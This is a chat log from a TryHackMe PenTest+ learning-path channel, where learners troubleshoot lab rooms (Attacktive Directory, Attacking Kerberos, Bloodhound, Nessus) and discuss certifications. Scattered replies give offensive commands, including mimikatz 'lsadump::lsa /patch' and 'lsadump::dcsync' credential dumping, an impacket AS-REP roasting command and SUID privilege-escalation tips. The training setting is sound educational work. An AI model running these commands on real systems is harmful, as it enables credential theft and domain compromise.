Hey everyone! Is this pathway helpful for taking PenTest+?

I'm new but I want to get good with learning anything related to cyber.

What would you recommend?

I'm also wondering

hi Mal

To pass the PenTest+ Certification, I recommend taking the course of Jason Dion on Udemy, he is a really good instructor. But I don't think you should attempt to the PenTest+ certification because it's a very theorical certification, i would suggest you to go more for certifcations from vendors like Offsec or eLearnSecurity.

Pentest+ satisfies DoD 8570 which is a big thing in the US

Royal salutations à tous

bro open the attackbox use the same script you used on your vm or whatever you were using.

very simple

the error is that you don't have

the module on your vm

attackbox has it preinstalled

Hello folks. Having trouble in Attacktive directory with the impacket tools. “No module names impacket.examples.utils’

Means you don't have impacket installed correctly

salut mec

https://tenor.com/view/high-five-top-gun-tom-cruise-gif-9817538

Is it much harder to do theoretical? I'm also aiming for eJPT.

How can you get more experience?

I haven t attempted for eJPT, but I have heard that if you solve CTFs it wont too hard. About the difficulty, i think that always depends of your preparation. In case of the PT+, it is reputated as a hard exam and there many many terms and definitions to know by hearth. It is funnier to prep for a practical exam as it requires you to do practical things. To get more experience just do CTFs

You're an absolute unit. Thank you for the help!

Gave +1 Rep to @normal quarry

You welcome! If you have more questions do not hesitate!

good day guys!
I am having a problem with Attacking Kerberos room!
I cant seem to understand where to put which hash in the golden/silver ticket task

can I get some help please?

the krbtgt one ?

If i understand your problem well, you do not understand how kerberos works

The krbtgt account always sign the ticket with his hash so you have to use that one

I understood that lol!

I dont understand one thing now

How can I get passwords after I have gotten a golden ticket

A golden ticket as administrator can do anything

So when this ticket is into memory you can do anything including dumping hashes with mimikatz

Are you looking for the command to dump hash with mimikatz ?

You can't directly get passwords normally you only can have hashes

Then you can crack those hashes

how do you get hashes?

I couldnt locate system32/SAM

If you're system, there's often cached passwords in memory you can grab

Yeah i know that thats why i said normally

You can use mimikatz

lsadump::lsa /patch

lsadump::dcsync /user:<DOMAIN><USER>

Hey all! I'm trying to understand Q2 on OWASP Top 10 in THM.

How many non-root/non-service/non-daemon users are there?

I did not see anything but how do we tell if there are users?

if you can check a specific file you can see all the users of a system

then from there you are looking for something that on windows would be equal to a documents folder
but in linux is called /home folders

Thank ya!

Gave +1 Rep to @torpid lance

Okay!

To you guys, is learning how to hack literally Googling? I'm starting to realize this because I don't know a DAMN thing.

to some extent yeah.... learning how to search and find answers to problems you are having is a huge part of tech stuff including hacking and programming

90% of it really

and the other 10% can be reading your past notes for how to do things instead of searching it up online

What would you guys recommend as a website that you can always refer back to?

Kinda like the place where you get your notes from?

I literally don't know shit about fuck and coming off of Security+, this is a whole different beast!

I use some particularly high quality THM rooms to refer back to, along with manuals and just google searches

That's awesome man! I thought I began to understand and then I look at a new technology and then I'm even more lost

Any time you're doing something new, it'll take you some time to find your feet

Hey folks i am preparing for the pentest+ exam any tips and guidance would be highly appreciated

Learn your tools and switches, practice a LOT

HI guys. Faced the problem on the last room of the past (Post-Exploitation Basics)
Task 3 Enumeration w/ Bloodhound
I do everything like it's written. Collect data with sharphound, copy it on attackbox with scp. Then I try to import (Import Graph) and it fails with error Bad JSON. Also tried to import with Drag&Drop. Then import freezes with messages File Created from incompatible collector (in View Upload Status)

You probably have to downgrade your version of bloodhound. I had this same issue and a few other posts like this; downgrading bloodhound seemed to work

not sure if it's possible on attack box. local kali mb too. mb build from source

bloodhound

For some reason I’m the attacktive directory module I’m not able to download bloodhound

I keep getting the error E: unable to locate bloodhound

are you using your own VM, or the attackbox?

attackbox

apt install bloodhound neo4j this is the command im using

yyes

oh really i didnt know

ok let me check

ok i see it thanks

btw is it possible to post screenshots in here ?

Hello guys im currently working on attacktive directory and keep getting an error when trying to run GetNPUsers.py

The two versions should be equal; check your installation.[2:13 PM]im not exactly sure what to check

Please don't post in multiple places, It's spam and just makes it harder to solve problems

You know what this is considered, right ?

https://tenor.com/view/confused-what-really-no-words-huh-gif-4487358

Yeah...

But i offered em help elsewhere

didn't want someone else to come in here and get confused

All good, I'm more messing with you than anything else 😄

So the whole mini-modding thing is dependant on whom you are?

interesting

No.

So.

Robert gave the person an answer in a different channel and asked not to spam on multiple channels.
I gave an answer to someone in a different channel and asked them the same.

Why did I get told off for "mini-modding" but you were joking with Robert?

I expected you to be more conscious on recognising what I was doing here.
This is not the right channel for that anyways.
If you want me to DM you, let me know.

Sure.

hi guys I am about to start my local-host vulnerabilities module. Any prerequisite?

as for the windows fundamentals, I only finished part 1 alongside the web fundamentals pathway and the first three modules of the pentest+ pathway

Regarding Post-Exploitation Basics Task 3, I found the most success using the Attackbox and the last Bloodhound version before version 4 (3.0.5 I think). After unzipping the download, run the file named "Bloodhound" in the folder using the "--no-sandbox" flag, and you should be good to go. DON'T use the version of Bloodhound already installed. As of 8/28/22, it's not compatible with the version of SharpHound on the Windows machine you're running mimikatz and whatnot on

Hope this saves people some time troubleshooting

nice thanks crow... going to book mark this answer for shadow using this @true frigate and hope to remember this when they need it to help others

Gave +1 Rep to @vernal plover

Cool 👍

One more thing: for Attacktive Directory, simply using "python3 impacket ..." didn't seem to work, but "python3.8 impacket ..." did. Something about the default version of python3 in the Attackbox not being compatible with the current version of Impacket (it mentioned needing Python version >=3.7). However, I don't remember whether or not python3.8 is already in the system or if it needs to be downloaded

The attackbox uses python3.9 for these tasks i believe. I'll update the room

This should make it clearer

Ah yes, it was 3.9. Thank you!

Ty. Hope that works. i just wasted hours to get Bloodhound run Properly -.-

Hope it works for you too 👍

it did import the zipfile using Bloodhound 3.0.5. Thanks!
Maybe someone from staff could update the room giving an hint for the working Bloodhound version..

Gave +1 Rep to @vernal plover

Yeah, because if memory serves, I only figured out the correct Bloodhound version by looking through this Discord

Ah, i missed this when i updated the other thing... Bloodhound was updated on the attackbox so that the new AD networks work properly. The joys of backwards compatability with other rooms... I'll speak with the room creator and Attackbox maintainer and see what the best solution is.

As it's a free room non-subscribers will find it a bit harder to get the Bloodhound 3.0.5 zip onto the VM, so I'm reluctant to just say "install this version" in the room

You rock 👍

I didn't know that was a thing, I'll check it out, see if it's on the attackbox and add it into the suggestion 🙂

Not sure what i'm doing wrong there... Even the verbose option doesn't give me much

I wondered for a sec, then figured it'd probably tell me XD Fixed that and get the same error. If you could that'd be great, might be an ID10T error, but i'm not sure

Nmap is saying yes. If the command is suboptimal I blame beer and lack of sleep 😄

domain controllers tend to have dns open

is what shadow has learnt from the few rooms on active directory

yeah, port 53 is listed as "Microsoft DNS"

Granted you're scanning tcp amd it was complaining about 53/udp

Ah yeah... Good point

I'll see what happens, There's some other things that are higher priority first 🙂

Thanks for checking though

Gave +1 Rep to @torpid lance

hi, I am in the last step Post-Explotation Basics and my local bloodhound server does not accept foldes as import

and when I tried to import jsons one by one appeared a bad json message

drag & drop th zip 🙂

should work

Regarding Post-Exploitation Basics Task 3, I found the most success using the Attackbox and the last Bloodhound version before version 4 (3.0.5 I think). After unzipping the download, run the file named "Bloodhound" in the folder using the "--no-sandbox" flag, and you should be good to go. DON'T use the version of Bloodhound already installed. As of 8/28/22, it's not compatible with the version of SharpHound on the Windows machine you're running mimikatz and whatnot on
Hope this saves people some time troubleshooting
@wooden ice

thanks I will try this

Gave +1 Rep to @true frigate

+1

It works. Dropping zip is the only way to import.

hi, I'm not able to access target machine via rdp

xfreerdp /dynamic-resolution +clipboard /cert:ignore /u:CONTROLLER /v:10.10.170.157 /u:Administrator /p:P@$$W0rd

Are you on the attackbox?

you might need quotes around that password, as it contains special characters.

Could someone help clarify in lay man's terms what a reverse shell is?

Thank You. Had the same Problem and it worked.

Gave +1 Rep to @idle smelt

A shell that connects back to provide access. Idk if that ever got answered

hey so im trying to use burp suite and in task 9 for the burp suite room it says download foxy proxy and when i tried using it my own kali vm with burp suite, it wont work. like i entered the proxy information and that caused my searches to hang but i never see the request on burp suite
everything works fine when i use the open browser option in burp suite itself but id like to know what im doing wrong while using my own browser aswell

anyone use foxy proxy in their own vm's and know how to set it up ?

Check the proxy tab and make sure intercept is off.
Firefox should error out if you have pointed it at a proxy that doesn't exist

so i was trying to download the cert for burpsuite to use so i can access sites through the proxy but to goto the site to download the cert it says i need a cert... im not sure if im explaining things correctly or if im just doing a dumb mistake. how do i download the cert to use burpsuite. i tried following the troubleshooting instructions but tht didnt help either

https://portswigger.net/burp/documentation/desktop/external-browser-config/certificate
This includes troubleshooting

I'm finishing up the THM path but I feel like I should still do more before my cert exam. For those that have taken the exam, what all did you use to study for Pentest+?

hello so i went to the site you gave and it said to download the cert i need to goto http://burpsuite. but when i go there i get this

it still says i need the cert but i thought i had to go there to get the cert

you are trying to go to the wrong website

it should be http://burpsuite/ not https://www[.]burpsuite[.]com/

yeah that isint working either

you need to connect foxyproxy to burps proxy first

or http://burpsuite/ will not work

i tried that too

if i do this it just says i need the cert to connect

but im tryna get the cert

i feel like im just missing something very obvious but idk what

http not https

i tried that too but its ok i figured it out. youtube tutorial did something completely diff but it works so wooo

nice nice

You need to accept it initially

Working on OWASP top 10 task 26. Where you create the python script in base64 and put it in the cookies. I keep getting this response for nc. Any ideas?

Looks like I have a connection but I can't find it

hi

I having a problem

root@ip-10-10-159-117:~/Downloads# python3.9 /opt/impacket/examples/GetNPUsers.py spookysec.local/svc-admin -no-pass
Impacket v0.10.1.dev1+20220606.123812.ac35841f - Copyright 2022 SecureAuth Corporation

[*] Getting TGT for svc-admin
[-] [Errno Connection error (SPOOKYSEC.LOCAL:88)] [Errno -2] Name or service not known

Error connection

any one can help?

nop

How can I do It

ok

an then??

and then?

It will work. xD

cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 tryhackme.lan tryhackme

The following lines are desirable for IPv6 capable hosts

::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters

That is what I saw within

What information did you find with Lassi's advice?

cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 tryhackme.lan tryhackme

The following lines are desirable for IPv6 capable hosts

::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters

But what do you do with a host file?

nothing else

Are you sure?

am going to add to spookeysec.local

right?

Yes.

But do you know why ?

nop

explain me pls

Google.

What do you do you with a host file

ok ok

I finished the room

thanks for yours helps

im doing the nessus room. on task 4 question 5 it asks a question based off of the scan that im supposed to perform. i put in the ip of the machine thm gives and i put in all the correct settings for the scan but i get no vulnerabilities when the scan is complete. i know that vulnerabilities are supposed to show up because when i followed the write up in the help section, it shows that vulnerabilities appeared and that would give me the answer to the question but i cant figure out why im getting nothing when i perform the scan

why is it that when i type in the ip in the attack box, the website comes up but not if i type in the ip on my actual browser or in a vm

are u connected to openvpn yet on your browser or VM?

no do i need to be connected to access the site?

yes u need to be connected to THM openvpn to access the machine that u started in there

facepalming hella hard rn lol thank you

Gave +1 Rep to @maiden remnant

does it matter if i have the vpn on my actual machine or my virtual machine

vpn helps u to connect to remote network

and by this u can only connect to 1 vpn while doing room in tryhackme and i recommend to connect to vpn in VM

gotchu thanks

i was asking cuz i was running the scan but its been running for like 10+ min so i was starting to wonder if i did something wrong

rule of thumb ping it first before u run any scan (unless the machine blocks scmp)

noted

i appreciate you

In the Nessus room (basics installation etc) - task4 scanning there is a question about scan type for lower bandwidth connection.
I think I'm looking where I'm supposed to, but even after finding the correct answer text on the interwebs I cannot find it in the Nessus screen. Is it a bug or am I reading very poorly? I'm on Nessus v10

Same for the next question on the Apache HTTP server version...

Same for the first question on task 5; it seems the plugin has been replaced by a recent one with a different ID

this one had the answer to the question in task 4 found out in task 5 🙂

what is it expecting there?

nothing matches the format

Yes there is.

whut

what am i overlooking

The brackets count as stars

i would say port scan all ports

ah damn

okey

thanks

forgot the brackets

my answer is incorrect here

anybody knows why?

I have a different answer which is correct.

It is.

also nessus bad

yeah thats it

thanks!

is it?

Eh, I don't use it as much as I used to.

I mean there's few alternatives

I'm making a new Vm and I won't be putting Nessus on it.

i'm just trying the basic pentesting tools room so that's why i'm using it

any alternatives?

i like the interface though

it's like nmap scan with a gui

It does a hell of a lot more

I haven't used the other functions yet

I can't see why this is a bad tool then

Plenty of issues with it, I mean you got one just now. A false positive on something reasonably simple.

good point

Has anyone used the pentest+ discount recently? I've had no luck applying the code. Curious if it's user error, or the voucher is expired( it says it expires dec 2021, but i see comments this year of people explaining how to apply it)

@edgy tulip said it was extended, but I've seen some people mention it doesn't work.

thanks, good to know that it is not just me.
i've emailed thm help, so will see what comes..

Gave +1 Rep to @spiral hollow

No idea why, but i finished the Active directory room and suddenly its marked as undone. How?

There is two AD basics rooms.

You may have done the old one.

But it was in this path and it was marked complete? @spiral hollow

Perhaps in the late UI switch they swapped over the rooms.

Yeah, but i can't be because it's the same questions i already answered

Look at the bottom of the room to see how old it is.

I'll check it out in a moment

the room is 52 days old

guess i'll start it over again

It's just weird that it didn't reset task 1 and 2

so i think that it is a bug

it may be that only the other that was changed, and task 1 and 2 stayed the same meaning you'll only get reset on the ones which has changed

Thank you! But... 😄

Currently on the Attacking Kerberos Task 4 - Looking at the previous chats in here, and I'm having the same issues cracking the hash but with no success. Any ideas as to what I'm doing wrong?

The instructions say that the "Pass.txt" dictionary is just a shortened version of rockyou. I decided to just use rockyou since it's already on the attackbox

oh...

silly words 😆

Downloaded Pass.txt (1240 lines) retried cracking the hash and no joy

Noted. Thank you

is there anyone who's doing offenssive pentesting path right?

Going to start

any one have a penetration testing room in tryhackme.....

what do you mean by that ?

If u have created a room where ppl can learn pt

Please let us know what's the update, is the code expired or what?

why are you spamming all the channels mate?

He thinks he is funny, after doing 5 year old kid stuff & then deleting it like nothing happens

he was banned he was a scammer he was dm'ing in private the moment you were replying to his messages

interesting, hope in future there will be less annoying ppl

Can anyone tell me if this path still gives a discount towards the voucher? I can't find anything at the moment to point towards it still being an active offer.

No don't think so

I completed it on 1 November this year (2022)

No the voucher date is expired.

But apparently it's still valid

Guys I have a question about kenobi room

Can u help me?

As a general rule of thumb, you are always best off with asking your question right away, that way it's more likely someone will respond 🙂

Ok so when I copied the bin sh inside curl and started the /usr/bin/menu the new shell run as root Bea cause /usr/bin/menu was owned by root right?

Well, it's giving you a root shell because the SUID bit was set, as well as it was owned by root, yes

Beside that this is only working because the menu binary is not using full paths

Thanks mate

@idle brook Hi. I noticed your eJPT cert in your THM profile congrats. How would I add a cert to my profile.

You can ask a mod to add them. Which certs do you have? For some, proof may be required

I have an eJPT v1

@zinc merlin I set my pic to my cert

Ok you have it 🙂 might wanna change your pfp re your name

Thank you Dolphin for the help greatly appreciated. I'll change back .

I was Doing Post-exploitation Room and Got the Loot.zip file using scp to my local machine But Bloodhound is not accepting the .json files or the zip file .

Neo4j is running perfectly fine .

I also get This when i start bloodhound

@zinc merlin

what do you guys think about the Certificate, its enough to look for work?

?

I don't think so But It's a good start

i think im gonna do it, any recomendations for the next cert?

PNPT Is pretty Nice

From Tcm-Security

@civic falcon check out the certification pathway Paul Jerimy made:

https://pauljerimy.com/security-certification-roadmap/

ty

Gave +1 Rep to @frosty orbit

This is pretty darn nice .

It’s dope to see everything listed visually. Especially when starting out because it can become quite overwhelming.

True Specially It's easy to see all the Popular Certs ( that you might don't know about) .

Would you guys say that after completing this path, you were prepared for pentest +?

Or is there anything else I should go out and look for to study

I'm thinking of going for it next potentially

i think im gonna do pentest+ anyway and then go for beginners paths, like CEH, Kali Linux Certified Professional. i dont know if this is the correct path , any opinions ?

Just this path alone won't help. You have to be able to identify and use 50 tools for exam. Plan ,scope and report a test. You can get a study guide online for $30 or a Udemy online course.

can anyone help to me kow the command switch used to scan all the ports in nmap?

man nmap

Have a read through.

i searched in the man but couldnt find it..

https://nmap.org/book/port-scanning-options.html#port-scanning-options-ports here you can find your answer

I started with the eJPT certification. Great hands on learning. The exam you pentest a fake company. You get 72 hours to complete the pentest and answer 20 questions. The cert wont land you a job. In my opinion you will learn more from eJPT then CEH/Pentest + combined and save a couple thousand dollars.

jur pen test path and offensive pen test is enough to make the eJPT cert?

I think that Ejpt cert is good enough for a entry level/intern job. Am i right

Yes. Tryhackme and eJPT course is enough to pass eJPT. It's the only training I had when I took the exam.

any promo code for eLearnSecurity Junior Penetration Tester v2 Exam Voucher? xD

@wintry bone 🤟🏾

?

Good shit .. that nmap post ... Ty

Is ejpt Voucher bought from any other source than their Website legitimate?

Took and passed Pentest+ this past weekend, and this course truly was VITAL in helping me understand a lot of the questions.

did you do another course to pass the exam?

I used Dion's PenTest+ but I learn better by doing rather then having someone tell me info.

do you guys reckon it is feasible to pass the pentest + as my first cert? assuming in the work of course

hello my hashcat isn't working when I tried unhashing kerbroas hash

Can someone explain why I use the first smbclient syntax I cannot get the .txt, but I use -Uusername%password and that works. The first one should work right?

because smbclient uses for login into system and for that it needs username and password

with smbclient you can only list shares without password & username

How is the comptia test structured?

You were in the wrong directory the first time. A directory you couldn't write to.

It's not to do with username or password. Look at the error, error opening local file. Local means on your machine

The test is 3 skill questions and the rest is multiple choice. That said, the questions are posed in a way that you need to read them carefully. You need 87% or so to pass. Several answers can be right, but one might be more right then the other

hey

I have a problem with bloodhound in the last room

postexploit room

I gather the loot in a zip file

but when im trying to upload it to bloodhound it wont't load

incompatible something

upload a newer version of sharphound or use an older version of bloodhound... as the room is quite old the bloodhound on the attackbox or in normal repos is a lot newer and therefor incompaitlbe with the older version of sharphound on the target machine

Hi I am trying to use Openvpn in Kali to access the first machine in this learning path. It is showing me that I am connected but I cannot do anything from my VM even though it is showing me as connected to THM.

Might be because you have NAT set for the VM

That's OK

NAT for the VM doesn't stop the VPN working

Ah ok. Sorry then

Quick question im trying to perform an Xmas scan ( $ sudo nmap -Pn -sX -p 1-999 10.x.x.x) this is the second question on Task 14 for the Nmap project. i keep receiving "999 ports are in an ignored state (meaning being filtered most likely by the firewall)". I thought by using -Pn i would be able to evade the firewalls ICMP block?

No, that's not what -Pn does at all

-Pn assumes the host is up

Nmap's ping probes aren't just ICMP probes, there's a lot more to it than that

And Nmap can't just evade the firewall's block. The block is a solid rule.

which question in said room and challenge are you stuck on???? also read ninja james messages as it explains things neatly

@true frigate hmmm its question 2 on task 14 of the nmap project* i know the answer but id like to learn how and why.

that seems like a super easy question to answer to shadow.... as you kinda answered that above

999 ports are BLAH

also a heavy recommendation when using nmap is to at least add -vv to it

to have more verbosity

@keen hornet ahh i see thanks

Gave +1 Rep to @keen hornet

@true frigate will do thnks

no problem

I'm having a strange problem where I can't get the hashs from the kerberos room out of terminal where hashcat will recognise the format ... any ideas or suggestions?

main problem seems to be it copies the format with line returns and spaces 😦

Ah yeah that problem... Shadow used a text editor with search and replace with regex support

Yep, trim those and it'll work. I think there's an argument for the program that outputs hashcat format

does finishing this path still give you a discount on the cert exam?

Yes,10%

Why thank you shadow, I'm still plagued by the problem but will endeavour to broaden my mind and explore the regex replacement method once one has found time to explore the command switches... thank you.

Gave +1 Rep to @true frigate

Thanks

Gave +1 Rep to @mighty stag

I'm in the Vulnversity room and can't connect to the machine. firefox says "unable to connect". It's been that way since yesterday. I terminated the machine, refreshed the browser activated the machine again but nothing will do. Can anyone help me sort it out? I have completed "reconnaissance" and "locating directories" sections with no problem. Then moved to "compromise webserver" and the issue began

the attackbox has sublime text which has the ability to do search and replace with regex

Do you have the right port?

do i need a port to open a webpage in firefox browser?

No, but you need to connect to the correct one here.

Hey, I was wondering if anyone has run into this with the CompTIA Pentest+ path. (Also, feel free to delete this if this is the wrong channel for this question. I wasn't sure if this fell into tech support or not?). I completed the path to get a 10% off voucher for the actual pentest+ exam, but the discount code expired at the end of 2021. Does THM still offer a valid discount these days, or has that offer long expired?

I guess the code works for the test voucher, but not any of the bundles. It doesn't seem like codes can stack either, which is fine. For people trying to save money on bundles like I was, the best bet might be to join the club for $50 and get 20% off. Sorry if this is getting off topic, but I know that code was a big carrot for me completing the pentest+ path before looking at official study materials 🤷 I assume other people in this chat would benefit from that info, but feel free to delete this if it's too off topic

Cc @edgy tulip might be worth investigating?

I'm doing the Nessus module. Anyone know why my nessus scan isn't getting results? I installed Nessus on my kali linux VM and ran a scan targeting the TryHackMe machine, and nothing is outputted.

Hi guys, I'm having a challenge with kerbrute on tha Attacktive Directory challenge room. I have given my kerbrute executable permissions but I keep getting a permission desired error when executing commands. Has anyone faced the same problem and jlhow can I resolve it?

Hi guys, i recently installed nessus but after a while i got an error during plugin installation so it's installed but without plugins, so is there a way to install plugins without any reinstalling

While trying to pull kerbrute from github, I am facing this issue. How to resolve this?

I gotta say the Attacktive Directory is just terrible. I have never encountered so many problems trying to install various programs from bloodhound to evil-winrm; I get error after error, and I cannot find any help. I really wish I could get my money back from tryhackme. I am wasting so much time not learning pentesting, just trying to get these programs to install properly. IMHO, this room is a piece of crap.

They are not installed already in the attack box.

And I wanted to set up my own linux machine for pentesting.

hi, I'm encountering a problem since last week and I need to find out where the issue lies. When I run nmap with -p- tag, I get starting nmap 7.60 and it hangs there forever, nothing ever happens again. But when I run it asking with no tag or with a range of ports (e.g p200-400), it works flawlessly. So what's wrong with the all ports -p- tag?

it depends on your internet speed and also the scan type. EG if you are using tcp connect scan it will take longer than syn stealth

Hello

Hi

hi

hi

Gm.

Hello 👋

Hey guys!
Does anyone have any idea abot the "bad json file" error in bloodhound?

I'm trying to import the json file for post exploitation basic room in task 3 but unable to do so.
Can anyone help me regarding that?

yuup that is because the sharphound.ps1 on the target machine is old so it is not compatible with the newest versions of bloodhound... either upload a newer version of sharphound.ps1 to the target machine or use the latest 3.0.x release of bloodhound

Thanks will give it try to downgrade bloodhound

has anybody else finished the pentest+ path but the progress is stuck at 99%?

#1092490706385383524

thanks

Gave +1 Rep to @spiral hollow

Is there a way that I can start neo4j version 4.0.1? The current version I have is 4.4.16

In machine "Post-Exploitation Basics" in task "Task 3 Enumeration w/ Bloodhound" troble. In victim's machine old version scriopt ps1, and bloodhound cant read this dump. When I download on victim machine new ps file I get some errors when i try do dump... it is awful.
do these rooms ever get updated? Instead of learning, I'm administering to get the job done

please, change file SharpHound.ps1 to new version on victim machine, or make remark "only BloodHound version 3.0 support dump file". Because I can open dump file only in 3.0 version of BloodHound on AttackBox

anyone know why the Vulnversity room in the Complete Beginner and PenTest+ Pathways are showing as incomplete but when you enter the room, all tasks are completed?

This is already a #1092490706385383524 and is being looked into by THM Staff.

Ok perfect, thanks for the heads up.

Gave +1 Rep to @vapid cipher

Hi,

Did you manage to finish everything from comptia pentest + path, but can't download the certificate because one room is unfinished (even though progress is 100%)?

It's because of the Vulnversity room, it's a known bug, they're working on it #1092490706385383524

Thank you, but this bug has status resolved...

What do you mean?

I reported this bug and I can see the status

It's right there in this channel #1092490706385383524, I would guess it means they acknowledge your report

Hey ya'll. I'm on task 14 of the nmap section of the pentest+ learning path.

Does the target (MACHINE_IP)respond to ICMP (ping) requests (Y/N)?

I've got my machine running on 10.10.134.218 - Which machine am I supposed to be scanning for the answers?

If it really says MACHINE_IP, you need to go back to task 1 and start the machine there

Ah, it expired. Forgive me, new to the THM platform, it's loading right now. Thank you for your assistance @daring ore!

Gave +1 Rep to @daring ore

It happens, especially when there's so much to do in a room. You're welcome 🙂

anyone help me ??

Hi everyone, currently working may way through the Attacking Kerberos room and am running into an issue when trying to enumerate users using Kerbrute. I've added the DC within my host file and am using the user list from the room however Kerbrute isnt finding any users, can anyone help me please?

ah ignore me, I used wget to download the user file but it downloaded the web page instead of the list, I knew it would be something really stupid

@topaz cobalt Glad you found solution. Have to mention, that in future, switch -v may save you quite a bit of debugging time. It can reveal an issue Kerbrute wouldn't else let you know about. Like if the user has Kerberos pre-auth turned off (should ring some bells!) or if there is an error with authentication. Like if your attacking machine's time differs greatly with the time on DC (cannot authenticate succesfully). :)

Running Attacking Kerberos room and having some issues with the hashcat command giving me errors, I have watched a few walkthroughs that show people using nano to put the hash into a hash.txt, I tried this but still get the same error, when I review the file the hash is split up, not sure if it's supposed to do that. I have tried also using the 23$ and without, still get the same errors.

you do need to fix the separation in the file

remove any space

you definitely need the 23$

Alright, will try that.

let me know how it goes

Cracked! Awesome, thanks,.

you're welcome 🙂

Hi. I'm currently working on OWASP Top 10, Task 5 and I'm trying to connect to evilshell.php link, but its tell me that my browser (Safari) can't find the server machine_ip/evilshell.php. I tried using Google and I get the same error message. Any suggestions?

Do you have an ip, or does it state "machine_ip" ?

Hello, in OWASP Top 10 - Task 18... the link provided to https://example.com/bank?account_number=1234 does not work. Also, in Task 19, which VM are they referring to, I do not see a link of any sort? In task 20 we are supposed to connect to a http://MY_IPADDRESS active machine but it simply comes to a page titled Note Viewer with a login and password form. The instructions state to click on "Reflected XSS" in the menu but there is no menu.

Task 25 requires to connect to http://machine_ip address as well and the Note Viewer page pops up.

Does it say "machine_ip" or does it say the IP of the machine?

Sounds like you haven't deployed the targets, and that first example is an example...

IP of the machine sorry

machine_ip

i will try again and give an update

can you please look at the URL in Task 18, it does not make sense. Also, the website we were supposed to visit for the 2nd question of task 18, it is the note viewer page and when putting in the credentials listed on the lab, a message comes up saying "I am noot!." it does not provide a key

nevermind i got that figured out

task 20 - XSS - same Note Viewer Page shows up... I have started the machine

i've checked some THM walkthrough pages and the instructions do reference a "reflected xss" tab

ok i reset my vpn and the machine and was able to get it to work, sorry for the inconvenience

Hey guys, is this path really benefical while studying for Pentest+ cert ?

it have content that is for pentest+ cert... so yea. can come handy

Anyone have an issue with attackbox on the Post Exploit room at the end?

Attack box doesn't have the loot.zip file preloaded to utilize with bloodhound. Can't SCP it from the windows client without Attack box root password. Unsure how to get loot.zip to attackbox

https://discordapp.com/channels/521382216299839518/680459914828972076/1096072327218876417

I stg...

@pine pine ^ Thats all I had to do last night...

oh man... lmao!

Are CTF's an actual staple as far as bread and butter task that Pentesters do or is it just to develop the skills in the tools used and methodologies?

what would you guys recommend as a prerequisite to starting this learning path? i know the website says to have "theorhetical knowledge of the pentest+ syllabus", but is that absolutely needed? thanks in advance

#974406074444685322
#pre-security-legacy-path
#junior-pentester-path
#878393611929129000 optionally
then this

i did intro, pre, and i started complete beginner, but was wondering if i could jump to pentest

also thank you very much for your response

no problem

Hey all, I'm working on the kerberos room thats part of this path, so far no issues but i do have a question that I cant seem to let go. With kerberoasting and as-rep roasting how does the actual cracking part work? I am familiar with the traditional methods of password hash cracking but as far as I can tell this is different, normally you have the hash of the password, then you go though your word list hashing each one and comparing. But in this case you have the hash of the TGT, so how does hashing passwords and comparing them to the TGT hash help at all? Thanks in advance - I cant find any clear explanation anywhere (probably bc Im misunderstanding something)

Hey guys, I'm on the metasploit part and trying to do the eternalblue exploit but get this "Exploit completed, but no session was created."
I'm using kali in a VM and have changed the LHOST to the openvpn IP. Any other troubleshooting ideas you guys have?

You're using the wrong IP.

RHOST is the target. LHOST the Listener Host, so your tun0.

sorry- thats what I meant. I did set LHOST to my tun0

not according to what you typed here you didn't.

yeah lol I meant LHOST

I have changed it

Did you set you Rhost?

sometimes it takes a few tries.

Do you have a target ip?

yes, set RHOST to the target and LHOST to my tun0

then do exploit -z

Do you have a macine open?

yes its active

Can I have the ip please?

10.10.171.205

Can you verify your account please, and type options and then send a screenshot?

!docs verify

I was setting LHOST to the actual IP, not "tun0". Would that make a difference? Ill try again

Typing tun0 saves you typing the ip, tun0 is the name of the interface.

You also might want to restart the machine, I kind of broke it...

lol okay

Once you do, go through the steps and then double check with options.

Thanks man its working now. I was using setg before if that could've had any affect

Has anybody else had issues installing kerbrute?

I'm working on installing krb5 instead

When I run command kinit root/admin@KALI I received message kinit:Cannot contact any KDC for realm KALI while getting initial credentials. I checked .conf file and domain is setup, systemctl confirms the server is running

nevermind DNS was not configured properly. It is now

Hi I am unable to download the completion certificate for the Pentest+ Path. I just finished it today , as tomorrow progress will be lost for the rooms disappearing, as per THM email. My issue: when I click to download the certificate, a pop-up window appears in brown saying "Fetching certificate, please wait", but then nothing. Thank if you can help.

Turns out I can download the certificate when I use Chrome, but not Firefox. I don't know why (maybe some extensions interfering on FF?) Issue solved.

hello, can someone please help me understand what exactly this flag do --data-length? I understand it appends random number to the packet sent, but why do we need to do add extra numbers to the packet?

It doesn't seem like there is much help unless you ask at a time when others are present

Understood, thank you!

Has the Pentest+ Path been updated yet? still looks the same as before from what I can see

ah, now it looks updated

Finally passed the exam last night

Congrats!

I'm just beginning the study path of preparing for it

@keen dew It's a good time for that since THM just updated the Pentest+ path.

What they added makes a lot of sense especially adding python related rooms.

Ya I had completed the Pentest+ path before but I just reset my progress for all the new rooms and starting fresh

Hello, would pentest+ path be better to start prior to Jr pentester path for a beginner?

prb not

There is a recommended path that is shared by @true frigate, but I can't seem to find it.

It's in general pins.

#general message

Thanks!

Gave +1 Rep to @spiral hollow

Thank you!

Gave +1 Rep to @vapid cipher

FYI for the CompTIA Pentest+ path, in the Python Basics, in Task 5, the pre-coded is incorrect.. many of you already know but just throwing it out there anyway... The correction was made by adding a separation between "bob"; and hungry.. like this 2nd screenshot..

I wanted to test it, not assume the code worked. When I tested the precoded on 1st screenshot, it threw an error, so I added a separation, 2nd screenshot was corrected.

BTW, I did pass the Pentest+ PT0-002, it was fun to do and wished there were more hands on. Should be 50% hands on and 50% Multiple Choices.

should i do this path before web fundamentals?

I would go with web fundaments first.

will do. whats your reasoning for choosing web first though. just curious

You'll need to start with the basiscs first as they'll strengthen your foundation later on. Aside from it, the pentest path may have more advanced topics as well.

OOPS! i thougth this was the jr pentester path channel. i meant to ask between that one and web fundamentals

There is a recommended path in the pinned post in the #general channel.

Guys I am having issue with connecting to the network in breaching AD

Can anyone help me with that? I tried all the methods

Did you check the pinned messages?

Yes

pinned messages in #pentest-plus-path right?

No, in the channel #breaching-ad

Thanks! I will check that out

Gave +1 Rep to @spiral hollow

Hi, I am doing the Python for Pentester rule. I am stucked at the ssh Brute Forcing Section. I bruteforced the password for tiffany, but I cannot log in. Using ssh in verbose mode I get the this: debug1: expecting SSH2_MSG_KEX_ECDH_REPLY there it hangs. Can anyone help?

restart the machine and try again

